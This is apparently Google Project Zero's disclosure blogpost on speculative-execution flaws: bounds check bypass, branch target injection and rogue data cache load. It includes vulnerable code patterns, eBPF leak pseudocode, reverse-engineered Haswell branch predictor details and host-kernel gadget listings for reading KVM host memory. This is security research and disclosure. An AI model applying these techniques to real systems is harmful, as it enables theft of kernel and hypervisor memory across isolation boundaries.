For interesting resources around this topic, look down into the "Literature" section.

A warning regarding explanations about processor internals in this blogpost: This blogpost contains a lot of speculation about hardware internals based on observed behavior, which might not necessarily correspond to what processors are actually doing.

We have some ideas on possible mitigations and provided some of those ideas to the processor vendors; however, we believe that the processor vendors are in a much better position than we are to design and evaluate mitigations, and we expect them to be the source of authoritative guidance.

The PoC code and the writeups that we sent to the CPU vendors will be made available at a later date.
Tested Processors
Intel(R) Xeon(R) CPU E5-1650 v3 @ 3.50GHz (called "Intel Haswell Xeon CPU" in the rest of this document)
AMD FX(tm)-8320 Eight-Core Processor (called "AMD FX CPU" in the rest of this document)
AMD PRO A8-9600 R7, 10 COMPUTE CORES 4C+6G (called "AMD PRO CPU" in the rest of this document)
An ARM Cortex A57 core of a Google Nexus 5x phone [6] (called "ARM Cortex A57" in the rest of this document)
Glossary
retire: An instruction retires when its results, e.g. register writes and memory writes, are committed and made visible to the rest of the system. Instructions can be executed out of order, but must always retire in order.

logical processor core: A logical processor core is what the operating system sees as a processor core. With hyperthreading enabled, the number of logical cores is a multiple of the number of physical cores.

cached/uncached data: In this blogpost, "uncached" data is data that is only present in main memory, not in any of the cache levels of the CPU. Loading uncached data will typically take over 100 cycles of CPU time.

speculative execution: A processor can execute past a branch without knowing whether it will be taken or where its target is, therefore executing instructions before it is known whether they should be executed. If this speculation turns out to have been incorrect, the CPU can discard the resulting state without architectural effects and continue execution on the correct execution path. Instructions do not retire before it is known that they are on the correct execution path.

mis-speculation window: The time window during which the CPU speculatively executes the wrong code and has not yet detected that mis-speculation has occurred.
Variant 1: Bounds check bypass
This section explains the common theory behind all three variants and the theory behind our PoC for variant 1 that, when running in userspace under a Debian distro kernel, can perform arbitrary reads in a 4GiB region of kernel memory in at least the following configurations:

Intel Haswell Xeon CPU, eBPF JIT is off (default state)
Intel Haswell Xeon CPU, eBPF JIT is on (non-default state)
AMD PRO CPU, eBPF JIT is on (non-default state)

The state of the eBPF JIT can be toggled using the net.core.bpf_jit_enable sysctl.
Theoretical explanation
The Intel Optimization Reference Manual says the following regarding Sandy Bridge (and later microarchitectural revisions) in section 2.3.2.3 ("Branch Prediction"):

Branch prediction predicts the branch target and enables the
processor to begin executing instructions long before the branch
true execution path is known.

In section 2.3.5.2 ("L1 DCache"):

Loads can:
[...]
Be carried out speculatively, before preceding branches are resolved.
Take cache misses out of order and in an overlapped manner.

Intel's Software Developer's Manual [7] states in Volume 3A, section 11.7 ("Implicit Caching (Pentium 4, Intel Xeon, and P6 family processors"):

Implicit caching occurs when a memory element is made potentially cacheable, although the element may never have been accessed in the normal von Neumann sequence. Implicit caching occurs on the P6 and more recent processor families due to aggressive prefetching, branch prediction, and TLB miss handling. Implicit caching is an extension of the behavior of existing Intel386, Intel486, and Pentium processor systems, since software running on these processor families also has not been able to deterministically predict the behavior of instruction prefetch.
Consider the code sample below. If arr1->length is uncached, the processor can speculatively load data from arr1->data[untrusted_offset_from_caller]. This is an out-of-bounds read. That should not matter because the processor will effectively roll back the execution state when the branch has executed; none of the speculatively executed instructions will retire (e.g. cause registers etc. to be affected).

struct array {
unsigned long length;
unsigned char data[];
};
struct array *arr1 = ...;
unsigned long untrusted_offset_from_caller = ...;
if (untrusted_offset_from_caller < arr1->length) {
unsigned char value = arr1->data[untrusted_offset_from_caller];
...
}
However, in the following code sample, there's an issue. If arr1->length, arr2->data[0x200] and arr2->data[0x300] are not cached, but all other accessed data is, and the branch conditions are predicted as true, the processor can do the following speculatively before arr1->length has been loaded and the execution is re-steered:

load value = arr1->data[untrusted_offset_from_caller]
start a load from a data-dependent offset in arr2->data, loading the corresponding cache line into the L1 cache

struct array {
unsigned long length;
unsigned char data[];
};
struct array *arr1 = ...; /* small array */
struct array *arr2 = ...; /* array of size 0x400 */
/* >0x400 (OUT OF BOUNDS!) */
unsigned long untrusted_offset_from_caller = ...;
if (untrusted_offset_from_caller < arr1->length) {
unsigned char value = arr1->data[untrusted_offset_from_caller];
unsigned long index2 = ((value&1)*0x100)+0x200;
if (index2 < arr2->length) {
unsigned char value2 = arr2->data[index2];
}
}

After the execution has been returned to the non-speculative path because the processor has noticed that untrusted_offset_from_caller is bigger than arr1->length, the cache line containing arr2->data[index2] stays in the L1 cache. By measuring the time required to load arr2->data[0x200] and arr2->data[0x300], an attacker can then determine whether the value of index2 during speculative execution was 0x200 or 0x300 - which discloses whether arr1->data[untrusted_offset_from_caller]&1 is 0 or 1.

To be able to actually use this behavior for an attack, an attacker needs to be able to cause the execution of such a vulnerable code pattern in the targeted context with an out-of-bounds index. For this, the vulnerable code pattern must either be present in existing code, or there must be an interpreter or JIT engine that can be used to generate the vulnerable code pattern. So far, we have not actually identified any existing, exploitable instances of the vulnerable code pattern; the PoC for leaking kernel memory using variant 1 uses the eBPF interpreter or the eBPF JIT engine, which are built into the kernel and accessible to normal users.

A minor variant of this could be to instead use an out-of-bounds read to a function pointer to gain control of execution in the mis-speculated path. We did not investigate this variant further.
Attacking the kernel
This section describes in more detail how variant 1 can be used to leak Linux kernel memory using the eBPF bytecode interpreter and JIT engine. While there are many interesting potential targets for variant 1 attacks, we chose to attack the Linux in-kernel eBPF JIT/interpreter because it provides more control to the attacker than most other JITs.

The Linux kernel supports eBPF since version 3.18. Unprivileged userspace code can supply bytecode to the kernel that is verified by the kernel and then:

either interpreted by an in-kernel bytecode interpreter
or translated to native machine code that also runs in kernel context using a JIT engine (which translates individual bytecode instructions without performing any further optimizations)

Execution of the bytecode can be triggered by attaching the eBPF bytecode to a socket as a filter and then sending data through the other end of the socket.

Whether the JIT engine is enabled depends on a run-time configuration setting - but at least on the tested Intel processor, the attack works independent of that setting.

Unlike classic BPF, eBPF has data types like data arrays and function pointer arrays into which eBPF bytecode can index. Therefore, it is possible to create the code pattern described above in the kernel using eBPF bytecode.

eBPF's data arrays are less efficient than its function pointer arrays, so the attack will use the latter where possible.

Both machines on which this was tested have no SMAP, and the PoC relies on that (but it shouldn't be a precondition in principle).

Additionally, at least on the Intel machine on which this was tested, bouncing modified cache lines between cores is slow, apparently because the MESI protocol is used for cache coherence [8]. Changing the reference counter of an eBPF array on one physical CPU core causes the cache line containing the reference counter to be bounced over to that CPU core, making reads of the reference counter on all other CPU cores slow until the changed reference counter has been written back to memory. Because the length and the reference counter of an eBPF array are stored in the same cache line, this also means that changing the reference counter on one physical CPU core causes reads of the eBPF array's length to be slow on other physical CPU cores (intentional false sharing).

The attack uses two eBPF programs. The first one tail-calls through a page-aligned eBPF function pointer array prog_map at a configurable index. In simplified terms, this program is used to determine the address of prog_map by guessing the offset from prog_map to a userspace address and tail-calling through prog_map at the guessed offsets. To cause the branch prediction to predict that the offset is below the length of prog_map, tail calls to an in-bounds index are performed in between. To increase the mis-speculation window, the cache line containing the length of prog_map is bounced to another core. To test whether an offset guess was successful, it can be tested whether the userspace address has been loaded into the cache.

Because such straightforward brute-force guessing of the address would be slow, the following optimization is used: 215 adjacent userspace memory mappings [9], each consisting of 24 pages, are created at the userspace address user_mapping_area, covering a total area of 231 bytes. Each mapping maps the same physical pages, and all mappings are present in the pagetables.

This permits the attack to be carried out in steps of 231 bytes. For each step, after causing an out-of-bounds access through prog_map, only one cache line each from the first 24 pages of user_mapping_area have to be tested for cached memory. Because the L3 cache is physically indexed, any access to a virtual address mapping a physical page will cause all other virtual addresses mapping the same physical page to become cached as well.

When this attack finds a hit—a cached memory location—the upper 33 bits of the kernel address are known (because they can be derived from the address guess at which the hit occurred), and the low 16 bits of the address are also known (from the offset inside user_mapping_area at which the hit was found). The remaining part of the address of user_mapping_area is the middle.

The remaining bits in the middle can be determined by bisecting the remaining address space: Map two physical pages to adjacent ranges of virtual addresses, each virtual address range the size of half of the remaining search space, then determine the remaining address bit-wise.

At this point, a second eBPF program can be used to actually leak data. In pseudocode, this program looks as follows:

uint64_t bitmask = <runtime-configurable>;
uint64_t bitshift_selector = <runtime-configurable>;
uint64_t prog_array_base_offset = <runtime-configurable>;
uint64_t secret_data_offset = <runtime-configurable>;
// index will be bounds-checked by the runtime,
// but the bounds check will be bypassed speculatively
uint64_t secret_data = bpf_map_read(array=victim_array, index=secret_data_offset);
// select a single bit, move it to a specific position, and add the base offset
uint64_t progmap_index = (((secret_data & bitmask) >> bitshift_selector) << 7) + prog_array_base_offset;
bpf_tail_call(prog_map, progmap_index);

This program reads 8-byte-aligned 64-bit values from an eBPF data array "victim_map" at a runtime-configurable offset and bitmasks and bit-shifts the value so that one bit is mapped to one of two values that are 27 bytes apart (sufficient to not land in the same or adjacent cache lines when used as an array index). Finally it adds a 64-bit offset, then uses the resulting value as an offset into prog_map for a tail call.

This program can then be used to leak memory by repeatedly calling the eBPF program with an out-of-bounds offset into victim_map that specifies the data to leak and an out-of-bounds offset into prog_map that causes prog_map + offset to point to a userspace memory area. Misleading the branch prediction and bouncing the cache lines works the same way as for the first eBPF program, except that now, the cache line holding the length of victim_map must also be bounced to another core.
Variant 2: Branch target injection
This section describes the theory behind our PoC for variant 2 that, when running with root privileges inside a KVM guest created using virt-manager on the Intel Haswell Xeon CPU, with a specific version of Debian's distro kernel running on the host, can read host kernel memory at a rate of around 1500 bytes/second.
Basics
Prior research (see the Literature section at the end) has shown that it is possible for code in separate security contexts to influence each other's branch prediction. So far, this has only been used to infer information about where code is located (in other words, to create interference from the victim to the attacker); however, the basic hypothesis of this attack variant is that it can also be used to redirect execution of code in the victim context (in other words, to create interference from the attacker to the victim; the other way around).

The basic idea for the attack is to target victim code that contains an indirect branch whose target address is loaded from memory and flush the cache line containing the target address out to main memory. Then, when the CPU reaches the indirect branch, it won't know the true destination of the jump, and it won't be able to calculate the true destination until it has finished loading the cache line back into the CPU, which takes a few hundred cycles. Therefore, there is a time window of typically over 100 cycles in which the CPU will speculatively execute instructions based on branch prediction.
Haswell branch prediction internals
Some of the internals of the branch prediction implemented by Intel's processors have already been published; however, getting this attack to work properly required significant further experimentation to determine additional details.

This section focuses on the branch prediction internals that were experimentally derived from the Intel Haswell Xeon CPU.

Haswell seems to have multiple branch prediction mechanisms that work very differently:

A generic branch predictor that can only store one target per source address; used for all kinds of jumps, like absolute jumps, relative jumps and so on.
A specialized indirect call predictor that can store multiple targets per source address; used for indirect calls.
(There is also a specialized return predictor, according to Intel's optimization manual, but we haven't analyzed that in detail yet. If this predictor could be used to reliably dump out some of the call stack through which a VM was entered, that would be very interesting.)
Generic predictor
The generic branch predictor, as documented in prior research, only uses the lower 31 bits of the address of the last byte of the source instruction for its prediction. If, for example, a branch target buffer (BTB) entry exists for a jump from 0x4141.0004.1000 to 0x4141.0004.5123, the generic predictor will also use it to predict a jump from 0x4242.0004.1000. When the higher bits of the source address differ like this, the higher bits of the predicted destination change together with it—in this case, the predicted destination address will be 0x4242.0004.5123—so apparently this predictor doesn't store the full, absolute destination address.

Before the lower 31 bits of the source address are used to look up a BTB entry, they are folded together using XOR. Specifically, the following bits are folded together:

bit A
bit B
0x40.0000
0x2000
0x80.0000
0x4000
0x100.0000
0x8000
0x200.0000
0x1.0000
0x400.0000
0x2.0000
0x800.0000
0x4.0000
0x2000.0000
0x10.0000
0x4000.0000
0x20.0000

In other words, if a source address is XORed with both numbers in a row of this table, the branch predictor will not be able to distinguish the resulting address from the original source address when performing a lookup. For example, the branch predictor is able to distinguish source addresses 0x100.0000 and 0x180.0000, and it can also distinguish source addresses 0x100.0000 and 0x180.8000, but it can't distinguish source addresses 0x100.0000 and 0x140.2000 or source addresses 0x100.0000 and 0x180.4000. In the following, this will be referred to as aliased source addresses.

When an aliased source address is used, the branch predictor will still predict the same target as for the unaliased source address. This indicates that the branch predictor stores a truncated absolute destination address, but that hasn't been verified.

Based on observed maximum forward and backward jump distances for different source addresses, the low 32-bit half of the target address could be stored as an absolute 32-bit value with an additional bit that specifies whether the jump from source to target crosses a 232 boundary; if the jump crosses such a boundary, bit 31 of the source address determines whether the high half of the instruction pointer should increment or decrement.
Indirect call predictor
The inputs of the BTB lookup for this mechanism seem to be:

The low 12 bits of the address of the source instruction (we are not sure whether it's the address of the first or the last byte) or a subset of them.
The branch history buffer state.

If the indirect call predictor can't resolve a branch, it is resolved by the generic predictor instead. Intel's optimization manual hints at this behavior: "Indirect Calls and Jumps. These may either be predicted as having a monotonic target or as having targets that vary in accordance with recent program behavior."

The branch history buffer (BHB) stores information about the last 29 taken branches - basically a fingerprint of recent control flow - and is used to allow better prediction of indirect calls that can have multiple targets.

The update function of the BHB works as follows (in pseudocode; src is the address of the last byte of the source instruction, dst is the destination address):

void bhb_update(uint58_t *bhb_state, unsigned long src, unsigned long dst) {
*bhb_state <<= 2;
*bhb_state ^= (dst & 0x3f);
*bhb_state ^= (src & 0xc0) >> 6;
*bhb_state ^= (src & 0xc00) >> (10 - 2);
*bhb_state ^= (src & 0xc000) >> (14 - 4);
*bhb_state ^= (src & 0x30) << (6 - 4);
*bhb_state ^= (src & 0x300) << (8 - 8);
*bhb_state ^= (src & 0x3000) >> (12 - 10);
*bhb_state ^= (src & 0x30000) >> (16 - 12);
*bhb_state ^= (src & 0xc0000) >> (18 - 14);
}

Some of the bits of the BHB state seem to be folded together further using XOR when used for a BTB access, but the precise folding function hasn't been understood yet.

The BHB is interesting for two reasons. First, knowledge about its approximate behavior is required in order to be able to accurately cause collisions in the indirect call predictor. But it also permits dumping out the BHB state at any repeatable program state at which the attacker can execute code - for example, when attacking a hypervisor, directly after a hypercall. The dumped BHB state can then be used to fingerprint the hypervisor or, if the attacker has access to the hypervisor binary, to determine the low 20 bits of the hypervisor load address (in the case of KVM: the low 20 bits of the load address of kvm-intel.ko).
Reverse-Engineering Branch Predictor Internals
This subsection describes how we reverse-engineered the internals of the Haswell branch predictor. Some of this is written down from memory, since we didn't keep a detailed record of what we were doing.

We initially attempted to perform BTB injections into the kernel using the generic predictor, using the knowledge from prior research that the generic predictor only looks at the lower half of the source address and that only a partial target address is stored. This kind of worked - however, the injection success rate was very low, below 1%. (This is the method we used in our preliminary PoCs for method 2 against modified hypervisors running on Haswell.)

We decided to write a userspace test case to be able to more easily test branch predictor behavior in different situations.

Based on the assumption that branch predictor state is shared between hyperthreads [10], we wrote a program of which two instances are each pinned to one of the two logical processors running on a specific physical core, where one instance attempts to perform branch injections while the other measures how often branch injections are successful. Both instances were executed with ASLR disabled and had the same code at the same addresses. The injecting process performed indirect calls to a function that accesses a (per-process) test variable; the measuring process performed indirect calls to a function that tests, based on timing, whether the per-process test variable is cached, and then evicts it using CLFLUSH. Both indirect calls were performed through the same callsite. Before each indirect call, the function pointer stored in memory was flushed out to main memory using CLFLUSH to widen the speculation time window. Additionally, because of the reference to "recent program behavior" in Intel's optimization manual, a bunch of conditional branches that are always taken were inserted in front of the indirect call.

In this test, the injection success rate was above 99%, giving us a base setup for future experiments.

We then tried to figure out the details of the prediction scheme. We assumed that the prediction scheme uses a global branch history buffer of some kind.

To determine the duration for which branch information stays in the history buffer, a conditional branch that is only taken in one of the two program instances was inserted in front of the series of always-taken conditional jumps, then the number of always-taken conditional jumps (N) was varied. The result was that for N=25, the processor was able to distinguish the branches (misprediction rate under 1%), but for N=26, it failed to do so (misprediction rate over 99%).
Therefore, the branch history buffer had to be able to store information about at least the last 26 branches.

The code in one of the two program instances was then moved around in memory. This revealed that only the lower 20 bits of the source and target addresses have an influence on the branch history buffer.

Testing with different types of branches in the two program instances revealed that static jumps, taken conditional jumps, calls and returns influence the branch history buffer the same way; non-taken conditional jumps don't influence it; the address of the last byte of the source instruction is the one that counts; IRETQ doesn't influence the history buffer state (which is useful for testing because it permits creating program flow that is invisible to the history buffer).

Moving the last conditional branch before the indirect call around in memory multiple times revealed that the branch history buffer contents can be used to distinguish many different locations of that last conditional branch instruction. This suggests that the history buffer doesn't store a list of small history values; instead, it seems to be a larger buffer in which history data is mixed together.

However, a history buffer needs to "forget" about past branches after a certain number of new branches have been taken in order to be useful for branch prediction. Therefore, when new data is mixed into the history buffer, this can not cause information in bits that are already present in the history buffer to propagate downwards - and given that, upwards combination of information probably wouldn't be very useful either. Given that branch prediction also must be very fast, we concluded that it is likely that the update function of the history buffer left-shifts the old history buffer, then XORs in the new state (see diagram).

If this assumption is correct, then the history buffer contains a lot of information about the most recent branches, but only contains as many bits of information as are shifted per history buffer update about the last branch about which it contains any data. Therefore, we tested whether flipping different bits in the source and target addresses of a jump followed by 32 always-taken jumps with static source and target allows the branch prediction to disambiguate an indirect call. [11]

With 32 static jumps in between, no bit flips seemed to have an influence, so we decreased the number of static jumps until a difference was observable. The result with 28 always-taken jumps in between was that bits 0x1 and 0x2 of the target and bits 0x40 and 0x80 of the source had such an influence; but flipping both 0x1 in the target and 0x40 in the source or 0x2 in the target and 0x80 in the source did not permit disambiguation. This shows that the per-insertion shift of the history buffer is 2 bits and shows which data is stored in the least significant bits of the history buffer. We then repeated this with decreased amounts of fixed jumps after the bit-flipped jump to determine which information is stored in the remaining bits.
Reading host memory from a KVM guest
Locating the host kernel
Our PoC locates the host kernel in several steps. The information that is determined and necessary for the next steps of the attack consists of:

lower 20 bits of the address of kvm-intel.ko
full address of kvm.ko
full address of vmlinux

Looking back, this is unnecessarily complicated, but it nicely demonstrates the various techniques an attacker can use. A simpler way would be to first determine the address of vmlinux, then bisect the addresses of kvm.ko and kvm-intel.ko.

In the first step, the address of kvm-intel.ko is leaked. For this purpose, the branch history buffer state after guest entry is dumped out. Then, for every possible value of bits 12..19 of the load address of kvm-intel.ko, the expected lowest 16 bits of the history buffer are computed based on the load address guess and the known offsets of the last 8 branches before guest entry, and the results are compared against the lowest 16 bits of the leaked history buffer state.

The branch history buffer state is leaked in steps of 2 bits by measuring misprediction rates of an indirect call with two targets. One way the indirect call is reached is from a vmcall instruction followed by a series of N branches whose relevant source and target address bits are all zeroes. The second way the indirect call is reached is from a series of controlled branches in userspace that can be used to write arbitrary values into the branch history buffer.
Misprediction rates are measured as in the section "Reverse-Engineering Branch Predictor Internals", using one call target that loads a cache line and another one that checks whether the same cache line has been loaded.

With N=29, mispredictions will occur at a high rate if the controlled branch history buffer value is zero because all history buffer state from the hypercall has been erased. With N=28, mispredictions will occur if the controlled branch history buffer value is one of 0<<(28*2), 1<<(28*2), 2<<(28*2), 3<<(28*2) - by testing all four possibilities, it can be detected which one is right. Then, for decreasing values of N, the four possibilities are {0|1|2|3}<<(28*2) | (history_buffer_for(N+1) >> 2). By repeating this for decreasing values for N, the branch history buffer value for N=0 can be determined.

At this point, the low 20 bits of kvm-intel.ko are known; the next step is to roughly locate kvm.ko.
For this, the generic branch predictor is used, using data inserted into the BTB by an indirect call from kvm.ko to kvm-intel.ko that happens on every hypercall; this means that the source address of the indirect call has to be leaked out of the BTB.

kvm.ko will probably be located somewhere in the range from 0xffffffffc0000000 to 0xffffffffc4000000, with page alignment (0x1000). This means that the first four entries in the table in the section "Generic Predictor" apply; there will be 24-1=15 aliasing addresses for the correct one. But that is also an advantage: It cuts down the search space from 0x4000 to 0x4000/24=1024.

To find the right address for the source or one of its aliasing addresses, code that loads data through a specific register is placed at all possible call targets (the leaked low 20 bits of kvm-intel.ko plus the in-module offset of the call target plus a multiple of 220) and indirect calls are placed at all possible call sources. Then, alternatingly, hypercalls are performed and indirect calls are performed through the different possible non-aliasing call sources, with randomized history buffer state that prevents the specialized prediction from working. After this step, there are 216 remaining possibilities for the load address of kvm.ko.

Next, the load address of vmlinux can be determined in a similar way, using an indirect call from vmlinux to kvm.ko. Luckily, none of the bits which are randomized in the load address of vmlinux are folded together, so unlike when locating kvm.ko, the result will directly be unique. vmlinux has an alignment of 2MiB and a randomization range of 1GiB, so there are still only 512 possible addresses.
Because (as far as we know) a simple hypercall won't actually cause indirect calls from vmlinux to kvm.ko, we instead use port I/O from the status register of an emulated serial port, which is present in the default configuration of a virtual machine created with virt-manager.

The only remaining piece of information is which one of the 16 aliasing load addresses of kvm.ko is actually correct. Because the source address of an indirect call to kvm.ko is known, this can be solved using bisection: Place code at the various possible targets that, depending on which instance of the code is speculatively executed, loads one of two cache lines, and measure which one of the cache lines gets loaded.
Identifying cache sets
The PoC assumes that the VM does not have access to hugepages.To discover eviction sets for all L3 cache sets with a specific alignment relative to a 4KiB page boundary, the PoC first allocates 25600 pages of memory. Then, in a loop, it selects random subsets of all remaining unsorted pages such that the expected number of sets for which an eviction set is contained in the subset is 1, reduces each subset down to an eviction set by repeatedly accessing its cache lines and testing whether the cache lines are always cached (in which case they're probably not part of an eviction set) and attempts to use the new eviction set to evict all remaining unsorted cache lines to determine whether they are in the same cache set [12].
Locating the host-virtual address of a guest page
Because this attack uses a FLUSH+RELOAD approach for leaking data, it needs to know the host-kernel-virtual address of one guest page. Alternative approaches such as PRIME+PROBE should work without that requirement.

The basic idea for this step of the attack is to use a branch target injection attack against the hypervisor to load an attacker-controlled address and test whether that caused the guest-owned page to be loaded. For this, a gadget that simply loads from the memory location specified by R8 can be used - R8-R11 still contain guest-controlled values when the first indirect call after a guest exit is reached on this kernel build.

We expected that an attacker would need to either know which eviction set has to be used at this point or brute-force it simultaneously; however, experimentally, using random eviction sets works, too. Our theory is that the observed behavior is actually the result of L1D and L2 evictions, which might be sufficient to permit a few instructions worth of speculative execution.

The host kernel maps (nearly?) all physical memory in the physmap area, including memory assigned to KVM guests. However, the location of the physmap is randomized (with a 1GiB alignment), in an area of size 128PiB. Therefore, directly bruteforcing the host-virtual address of a guest page would take a long time. It is not necessarily impossible; as a ballpark estimate, it should be possible within a day or so, maybe less, assuming 12000 successful injections per second and 30 guest pages that are tested in parallel; but not as impressive as doing it in a few minutes.

To optimize this, the problem can be split up: First, brute-force the physical address using a gadget that can load from physical addresses, then brute-force the base address of the physmap region. Because the physical address can usually be assumed to be far below 128PiB, it can be brute-forced more efficiently, and brute-forcing the base address of the physmap region afterwards is also easier because then address guesses with 1GiB alignment can be used.

To brute-force the physical address, the following gadget can be used:

ffffffff810a9def: 4c 89 c0 mov rax,r8
ffffffff810a9df2: 4d 63 f9 movsxd r15,r9d
ffffffff810a9df5: 4e 8b 04 fd c0 b3 a6 mov r8,QWORD PTR [r15*8-0x7e594c40]
ffffffff810a9dfc: 81
ffffffff810a9dfd: 4a 8d 3c 00 lea rdi,[rax+r8*1]
ffffffff810a9e01: 4d 8b a4 00 f8 00 00 mov r12,QWORD PTR [r8+rax*1+0xf8]
ffffffff810a9e08: 00

This gadget permits loading an 8-byte-aligned value from the area around the kernel text section by setting R9 appropriately, which in particular permits loading page_offset_base, the start address of the physmap. Then, the value that was originally in R8 - the physical address guess minus 0xf8 - is added to the result of the previous load, 0xfa is added to it, and the result is dereferenced.
Cache set selection
To select the correct L3 eviction set, the attack from the following section is essentially executed with different eviction sets until it works.
Leaking data
At this point, it would normally be necessary to locate gadgets in the host kernel code that can be used to actually leak data by reading from an attacker-controlled location, shifting and masking the result appropriately and then using the result of that as offset to an attacker-controlled address for a load. But piecing gadgets together and figuring out which ones work in a speculation context seems annoying. So instead, we decided to use the eBPF interpreter, which is built into the host kernel - while there is no legitimate way to invoke it from inside a VM, the presence of the code in the host kernel's text section is sufficient to make it usable for the attack, just like with ordinary ROP gadgets.

The eBPF interpreter entry point has the following function signature:

static unsigned int __bpf_prog_run(void *ctx, const struct bpf_insn *insn)

The second parameter is a pointer to an array of statically pre-verified eBPF instructions to be executed - which means that __bpf_prog_run() will not perform any type checks or bounds checks. The first parameter is simply stored as part of the initial emulated register state, so its value doesn't matter.

The eBPF interpreter provides, among other things:

multiple emulated 64-bit registers
64-bit immediate writes to emulated registers
memory reads from addresses stored in emulated registers
bitwise operations (including bit shifts) and arithmetic operations

To call the interpreter entry point, a gadget that gives RSI and RIP control given R8-R11 control and controlled data at a known memory location is necessary. The following gadget provides this functionality:

ffffffff81514edd: 4c 89 ce mov rsi,r9
ffffffff81514ee0: 41 ff 90 b0 00 00 00 call QWORD PTR [r8+0xb0]

Now, by pointing R8 and R9 at the mapping of a guest-owned page in the physmap, it is possible to speculatively execute arbitrary unvalidated eBPF bytecode in the host kernel. Then, relatively straightforward bytecode can be used to leak data into the cache.
Variant 3: Rogue data cache load
Basically, read Anders Fogh's blogpost: https://cyber.wtf/2017/07/28/negative-result-reading-kernel-memory-from-user-mode/

In summary, an attack using this variant of the issue attempts to read kernel memory from userspace without misdirecting the control flow of kernel code. This works by using the code pattern that was used for the previous variants, but in userspace. The underlying idea is that the permission check for accessing an address might not be on the critical path for reading data from memory to a register, where the permission check could have significant performance impact. Instead, the memory read could make the result of the read available to following instructions immediately and only perform the permission check asynchronously, setting a flag in the reorder buffer that causes an exception to be raised if the permission check fails.

We do have a few additions to make to Anders Fogh's blogpost:

"Imagine the following instruction executed in usermode
mov rax,[somekernelmodeaddress]
It will cause an interrupt when retired, [...]"

It is also possible to already execute that instruction behind a high-latency mispredicted branch to avoid taking a page fault. This might also widen the speculation window by increasing the delay between the read from a kernel address and delivery of the associated exception.

"First, I call a syscall that touches this memory. Second, I use the prefetcht0 instruction to improve my odds of having the address loaded in L1."

When we used prefetch instructions after doing a syscall, the attack stopped working for us, and we have no clue why. Perhaps the CPU somehow stores whether access was denied on the last access and prevents the attack from working if that is the case?

"Fortunately I did not get a slow read suggesting that Intel null’s the result when the access is not allowed."

That (read from kernel address returns all-zeroes) seems to happen for memory that is not sufficiently cached but for which pagetable entries are present, at least after repeated read attempts. For unmapped memory, the kernel address read does not return a result at all.
Ideas for further research
We believe that our research provides many remaining research topics that we have not yet investigated, and we encourage other public researchers to look into these.
This section contains an even higher amount of speculation than the rest of this blogpost - it contains untested ideas that might well be useless.
Leaking without data cache timing
It would be interesting to explore whether there are microarchitectural attacks other than measuring data cache timing that can be used for exfiltrating data out of speculative execution.
Other microarchitectures
Our research was relatively Haswell-centric so far. It would be interesting to see details e.g. on how the branch prediction of other modern processors works and how well it can be attacked.
Other JIT engines
We developed a successful variant 1 attack against the JIT engine built into the Linux kernel. It would be interesting to see whether attacks against more advanced JIT engines with less control over the system are also practical - in particular, JavaScript engines.
More efficient scanning for host-virtual addresses and cache sets
In variant 2, while scanning for the host-virtual address of a guest-owned page, it might make sense to attempt to determine its L3 cache set first. This could be done by performing L3 evictions using an eviction pattern through the physmap, then testing whether the eviction affected the guest-owned page.

The same might work for cache sets - use an L1D+L2 eviction set to evict the function pointer in the host kernel context, use a gadget in the kernel to evict an L3 set using physical addresses, then use that to identify which cache sets guest lines belong to until a guest-owned eviction set has been constructed.
Dumping the complete BTB state
Given that the generic BTB seems to only be able to distinguish 231-8 or fewer source addresses, it seems feasible to dump out the complete BTB state generated by e.g. a hypercall in a timeframe around the order of a few hours. (Scan for jump sources, then for every discovered jump source, bisect the jump target.) This could potentially be used to identify the locations of functions in the host kernel even if the host kernel is custom-built.

The source address aliasing would reduce the usefulness somewhat, but because target addresses don't suffer from that, it might be possible to correlate (source,target) pairs from machines with different KASLR offsets and reduce the number of candidate addresses based on KASLR being additive while aliasing is bitwise.

This could then potentially allow an attacker to make guesses about the host kernel version or the compiler used to build it based on jump offsets or distances between functions.
Variant 2: Leaking with more efficient gadgets
If sufficiently efficient gadgets are used for variant 2, it might not be necessary to evict host kernel function pointers from the L3 cache at all; it might be sufficient to only evict them from L1D and L2.
Various speedups
In particular the variant 2 PoC is still a bit slow. This is probably partly because:

It only leaks one bit at a time; leaking more bits at a time should be doable.
It heavily uses IRETQ for hiding control flow from the processor.

It would be interesting to see what data leak rate can be achieved using variant 2.
Leaking or injection through the return predictor
If the return predictor also doesn't lose its state on a privilege level change, it might be useful for either locating the host kernel from inside a VM (in which case bisection could be used to very quickly discover the full address of the host kernel) or injecting return targets (in particular if the return address is stored in a cache line that can be flushed out by the attacker and isn't reloaded before the return instruction).

However, we have not performed any experiments with the return predictor that yielded conclusive results so far.
Leaking data out of the indirect call predictor
We have attempted to leak target information out of the indirect call predictor, but haven't been able to make it work.
Vendor statements
The following statement were provided to us regarding this issue from the vendors to whom Project Zero disclosed this vulnerability:
Intel
No current statement provided at this time.
AMD
AMD provided the following link: http://www.amd.com/en/corporate/speculative-execution
ARM
Arm recognises that the speculation functionality of many modern high-performance processors, despite working as intended, can be used in conjunction with the timing of cache operations to leak some information as described in this blog. Correspondingly, Arm has developed software mitigations that we recommend be deployed.

Specific details regarding the affected processors and mitigations can be found at this website: https://developer.arm.com/support/security-update

Arm has included a detailed technical whitepaper as well as links to information from some of Arm’s architecture partners regarding their specific implementations and mitigations.
Literature
Note that some of these documents - in particular Intel's documentation - change over time, so quotes from and references to it may not reflect the latest version of Intel's documentation.

https://www.intel.com/content/dam/www/public/us/en/documents/manuals/64-ia-32-architectures-optimization-manual.pdf: Intel's optimization manual has many interesting pieces of optimization advice that hint at relevant microarchitectural behavior; for example:
"Placing data immediately following an indirect branch can cause a performance problem. If the data consists of all zeros, it looks like a long stream of ADDs to memory destinations and this can cause resource conflicts and slow down branch recovery. Also, data immediately following indirect branches may appear as branches to the branch predication [sic] hardware, which can branch off to execute other data pages. This can lead to subsequent self-modifying code problems."
"Loads can:[...]Be carried out speculatively, before preceding branches are resolved."
"Software should avoid writing to a code page in the same 1-KByte subpage that is being executed or fetching code in the same 2-KByte subpage of that is being written. In addition, sharing a page containing directly or speculatively executed code with another processor as a data page can trigger an SMC condition that causes the entire pipeline of the machine and the trace cache to be cleared. This is due to the self-modifying code condition."
"if mapped as WB or WT, there is a potential for speculative processor reads to bring the data into the caches"
"Failure to map the region as WC may allow the line to be speculatively read into the processor caches (via the wrong path of a mispredicted branch)."
https://software.intel.com/en-us/articles/intel-sdm: Intel's Software Developer Manuals
http://www.agner.org/optimize/microarchitecture.pdf: Agner Fog's documentation of reverse-engineered processor behavior and relevant theory was very helpful for this research.
